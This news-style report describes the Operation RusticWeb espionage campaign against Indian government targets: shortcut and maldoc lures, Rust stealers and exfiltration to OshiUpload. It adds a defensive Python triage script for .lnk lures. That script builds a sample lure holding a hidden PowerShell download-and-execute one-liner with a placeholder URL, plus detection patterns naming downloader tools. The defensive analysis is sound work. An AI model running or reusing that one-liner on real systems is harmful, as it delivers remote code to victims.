Pakistan-based hackers are targeting the Indian government and defence industry in a campaign tracked as Operation RusticWeb. The threat actors write their malware in compiled languages such as Golang, Rust, and Nim, which are still uncommon in malware and so make the resulting binaries harder to detect.
Notably, stolen documents are exfiltrated to OshiUpload, a public anonymous file-sharing service, rather than to a traditional command-and-control (C2) server. Researchers from Seqrite found at least two infection chains targeting India that deliver new Rust-based payloads.
Researchers also found that the threat actors registered fake, malicious domain names to lure victims. Some of these domains impersonate reputable NGOs and organisations, including the Army Welfare Education Society (AWES), Parichay (a government single sign-on platform), the IPR (immovable property return) of the Department of Personnel and Training, the nomination form for the Defence Services Officers Provident (DSOP) Fund, and the Kailash Satyarthi Children’s Foundation.
Infection chain 1
Researchers observed that in the first infection chain, the threat actors used spear-phishing to lead the victim to a file named IPR_2023-24. The file carries a double extension: it is a Windows shortcut (.lnk) masquerading as a legitimate PDF.
When the victim opens the file, the shortcut fetches a script via the rb[.]gy URL shortener. The multi-stage attack then progresses through a PowerShell stage, a downloader stage that checks the system, and a final stealer stage.
The PowerShell script sets up the URL paths for downloading subsequent payloads and drops a decoy PDF posing as a form related to the ‘Indian Administrative Service’. The downloader stage is a Rust-compiled binary that collects system information and establishes persistence.
The final stealer payload, also written in Rust, collects files and system data and uploads them to OshiUpload, an anonymous public file-sharing service.
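The first stage of this chain is a classic lure shape: a Windows shortcut whose name ends in a document extension and whose target is a script host pulling a stage from a URL shortener. The following is an added example, not Seqrite's tooling or any artefact from the report. It parses the StringData fields of a Shell Link (.lnk) file directly from the MS-SHLLINK layout and flags the traits the article describes: a double extension, a script-host target, download cmdlets, a hidden console window, a short-link domain, and an icon borrowed from another program. The sample shortcut is constructed in the script, its URL is a placeholder rather than an indicator, and the shortener list and the threshold of two findings are illustrative assumptions.

```python
"""Static triage of Windows shortcut (.lnk) lures such as the double-extension
'PDF' in infection chain 1.  Example code added for this article, not Seqrite's
tooling.  The shortcut bytes below are constructed here; the URL is a placeholder."""
import ntpath
import re
import struct
import uuid
from urllib.parse import urlparse

# MS-SHLLINK LinkFlags bits that decide which optional structures follow the header
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
SHELL_LINK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")
STRING_DATA = (  # StringData fields, in the order the format lays them out
    (HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"))

SCRIPT_HOSTS = re.compile(r"powershell|pwsh|cmd\.exe|mshta|wscript|cscript|certutil|bitsadmin|curl\b", re.I)
DOWNLOAD_CMDLETS = re.compile(r"\biwr\b|invoke-webrequest|downloadstring|downloadfile|\biex\b|invoke-expression|-enc\b", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
DOC_DOUBLE_EXT = re.compile(r"\.(?:pdf|docx?|xlsx?|pptx?|txt|jpe?g|png)\.lnk$", re.I)
URL_SHORTENERS = {"rb.gy", "bit.ly", "tinyurl.com", "t.ly", "cutt.ly"}  # assumption: illustrative list


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a Shell Link (the ID list and LinkInfo are skipped)."""
    (header_size,) = struct.unpack_from("<I", data, 0)
    if header_size != 0x4C or uuid.UUID(bytes_le=data[4:20]) != SHELL_LINK_CLSID:
        raise ValueError("not a Shell Link file")
    (flags,) = struct.unpack_from("<I", data, 20)
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (2 bytes) + ItemIDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for flag, name in STRING_DATA:
        fields[name] = ""
        if not flags & flag:
            continue
        (count,) = struct.unpack_from("<H", data, pos)   # CountCharacters, no terminator
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
        pos += count * width
    return fields


def triage_lnk(filename: str, data: bytes) -> dict:
    """Flag a shortcut that looks like a document but launches a downloader."""
    f = parse_lnk(data)
    cmd = f"{f['relative_path']} {f['arguments']}"
    findings = []
    if DOC_DOUBLE_EXT.search(filename):
        findings.append("double extension: document name with a .lnk suffix")
    if SCRIPT_HOSTS.search(cmd):
        findings.append("target is a script host or living-off-the-land downloader")
    if DOWNLOAD_CMDLETS.search(f["arguments"]):
        findings.append("arguments download or evaluate remote content")
    if HIDDEN_WINDOW.search(f["arguments"]):
        findings.append("console window hidden")
    for url in re.findall(r"https?://[^\s\"']+", f["arguments"]):
        host = (urlparse(url).hostname or "").lower()
        if host in URL_SHORTENERS:
            findings.append(f"stage fetched through URL shortener {host}")
    icon = f["icon_location"]
    if icon and ntpath.basename(icon).lower() != ntpath.basename(f["relative_path"]).lower():
        findings.append(f"icon borrowed from {ntpath.basename(icon)}")
    return {"fields": f, "findings": findings, "suspicious": len(findings) >= 2}  # threshold is an assumption


def build_lnk(relative_path: str, arguments: str, icon_location: str) -> bytes:
    """Assemble a minimal Unicode Shell Link (header + StringData only) for testing."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I16sI", 0x4C, SHELL_LINK_CLSID.bytes_le, flags)
    # FileAttributes, three FILETIMEs, FileSize, IconIndex, ShowCommand=7 (SW_SHOWMINNOACTIVE), HotKey, Reserved
    header += struct.pack("<I3QIIIHHII", 0, 0, 0, 0, 0, 0, 7, 0, 0, 0, 0)
    assert len(header) == 0x4C
    enc = lambda s: struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + enc(relative_path) + enc(arguments) + enc(icon_location)


# Constructed samples: a lure shaped like the chain-1 shortcut, and a benign shortcut to a real PDF
LURE_NAME = "IPR_2023-24.pdf.lnk"
LURE_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    '-w hidden -nop -c "iwr https://rb.gy/placeholder -UseBasicParsing | iex"',  # placeholder URL
    r"%ProgramFiles%\Adobe\Acrobat\AcroRd32.exe")
BENIGN_NAME = "Report.lnk"
BENIGN_LNK = build_lnk(r"..\Documents\Report.pdf", "", "")

if __name__ == "__main__":
    for name, blob in ((LURE_NAME, LURE_LNK), (BENIGN_NAME, BENIGN_LNK)):
        result = triage_lnk(name, blob)
        print(name, "SUSPICIOUS" if result["suspicious"] else "clean", result["findings"])
```

Run against a directory of attachments, the script reports the lure with six findings and the benign shortcut with none. Real shortcuts usually carry a LinkTargetIDList and LinkInfo before the strings; the parser skips both by their declared sizes, so it also handles files that Windows Explorer created rather than only the minimal ones built here.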
When researchers analysed the campaign’s victimology, they found a deliberate focus on Indian government officials. Although the data does not confirm specific victims, the campaign went live in September, with a significant surge in activity observed in October.
Notably, 26.53% of the activity during this period originated from India, providing crucial insight into the attackers’ geographic targets.
Infection chain 2
The investigation also uncovered a second infection chain in December, showing how readily the threat actors adapt. This variant uses malicious documents (maldocs) and encrypted PowerShell scripts.
The attack starts with phishing maldocs whose VBA macros contain encrypted PowerShell commands. Once decrypted and run, the scripts download decoy files and next-stage scripts from the fake domains, and eventually execute Rust-based payloads for enumeration and exfiltration.
All the fake domains the threat actors used imitated government services, for example parichay.epar[.]in or parichay.nic[.]in. Parichay is the NIC single sign-on that authenticates government employees to NIC services; Jan Parichay does the same for citizens.
“Operation RusticWeb could be linked to an APT threat as it shares similarities with various Pakistan-linked groups. As threat actors shift to malware developed using newly compiled languages like Golang, Rust, and Nim, we recommend proceeding cautiously and taking necessary precautions to stay protected,” said researchers.